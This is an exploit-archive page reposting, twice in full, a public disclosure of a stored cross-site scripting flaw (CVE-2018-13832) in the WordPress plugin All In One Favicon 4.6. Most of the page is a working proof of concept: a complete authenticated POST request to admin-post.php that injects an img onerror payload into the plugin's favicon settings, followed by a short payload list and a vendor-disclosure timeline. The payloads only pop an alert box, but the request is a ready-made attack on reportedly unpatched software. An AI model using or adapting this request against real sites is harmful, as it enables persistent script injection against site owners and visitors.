Wordpress plugin all in one favicon 4.6 (authenticated) crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-07-19 | Type : webapps | Platform : php
This exploit / vulnerability Wordpress plugin all in one favicon 4.6 (authenticated) crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo

# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.

Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text

Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"

9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"

aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"

"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"

Guardar cambios
-----------------------------168911549614148

Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"

true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148--

Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/
# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo

# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.

Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text

Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"

9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"

aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"

"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"

Guardar cambios
-----------------------------168911549614148

Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"

true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148--

Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/

Wordpress plugin all in one favicon 4.6 (authenticated) crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Wordpress plugin all in one favicon 4.6 (authenticated) crosssite scripting Vulnerability / Exploit